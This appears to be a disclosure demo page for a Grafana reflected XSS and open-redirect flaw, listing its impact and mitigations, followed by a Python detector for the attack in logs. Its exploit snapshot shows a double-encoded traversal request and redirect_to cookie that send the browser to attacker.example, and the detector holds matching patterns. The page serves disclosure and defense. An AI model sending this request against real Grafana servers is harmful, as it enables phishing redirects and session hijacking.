Grafana Reflected XSS → Impact Demonstration

You have been redirected here as part of the demo. This page does not perform a further redirect; it stands in for whatever content the attacker would serve at this point. That could be malicious JavaScript, phishing content, or a fake Grafana plugin used to hijack user sessions.

What this proves

  • Forced navigation to attacker-controlled content.
  • JavaScript execution possible in the victim’s browser context.
  • Session hijack / account takeover via stolen cookies or API misuse.
  • Phishing / social engineering possible with look-alike Grafana UIs.
  • Optional SSRF if the Image Renderer plugin is enabled.

Why this must be fixed

Business impact:
  • Unauthorized access to dashboards and sensitive data.
  • Privilege escalation and tampering with alerts/configuration.
  • Regulatory and reputational damage from compromised accounts.

Fix / Mitigation

  • Upgrade Grafana to a patched version (e.g. 12.0.0+security-01, 11.6.1+security-01).
  • Apply strict Content Security Policy rules as per vendor guidance.
  • Monitor for suspicious redirect patterns and cookie abuse.

Exploit snapshot

GET /public/..%2F%5cattacker.example%2F%3f%2F..%2F..
Cookie: redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cattacker...
→ HTTP/1.1 302 Found
Location: /\attacker.example/?/../../
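The request/response pattern in the snapshot above is also what the "monitor for suspicious redirect patterns" item under Fix / Mitigation should catch. The following is an added detection example, not part of this demo page or of Grafana: it repeatedly percent-decodes the request path and the redirect_to cookie so that the double-encoded mix of ".." and "\" becomes visible, and flags a Location header that is scheme-relative despite starting with a slash. The event dictionaries and the benign lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample: request/response fields as a log pipeline might hand
# them over. Event 0 reuses the path/cookie/Location from the snapshot above
# (the elided host spelled out as attacker.example); events 1 and 2 are
# made-up benign traffic for contrast.
SAMPLE_EVENTS = [
    {"path": "/public/..%2F%5cattacker.example%2F%3f%2F..%2F..",
     "cookie": "redirect_to=%2Frender%2Fpublic%2F..%25252f%25255Cattacker.example",
     "location": "/\\attacker.example/?/../../"},
    {"path": "/public/build/grafana.app.js", "cookie": "grafana_session=abc", "location": ""},
    {"path": "/login", "cookie": "redirect_to=%2Fd%2Fabc123%2Fmy-dashboard",
     "location": "/d/abc123/my-dashboard"},
]

def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until stable so double/triple-encoded traversal shows up."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

# ".." followed by a backslash (possibly after slashes): the snapshot's
# "..%2F%5c" decodes to "../\", which some normalisers treat as "..\".
TRAVERSAL_RE = re.compile(r"\.\.[\\/]*\\")
# A Location starting with "/\", "\/", "//" or "\\" is scheme-relative and
# sends the browser to another host even though it looks like a local path.
OPEN_REDIRECT_RE = re.compile(r"^[\\/]{2}")

def classify(event: dict) -> list[str]:
    """Return the reasons an event is suspicious (empty list = benign)."""
    reasons = []
    if TRAVERSAL_RE.search(fully_decode(event.get("path", ""))):
        reasons.append("backslash traversal in request path")
    m = re.search(r"(?:^|;\s*)redirect_to=([^;]*)", event.get("cookie", ""))
    if m and TRAVERSAL_RE.search(fully_decode(m.group(1))):
        reasons.append("backslash traversal in redirect_to cookie")
    if OPEN_REDIRECT_RE.match(event.get("location", "")):
        reasons.append("scheme-relative Location header")
    return reasons

def suspicious_events(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index every event that triggers at least one rule, with its reasons."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]

if __name__ == "__main__":
    for idx, why in suspicious_events(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(why)}")
```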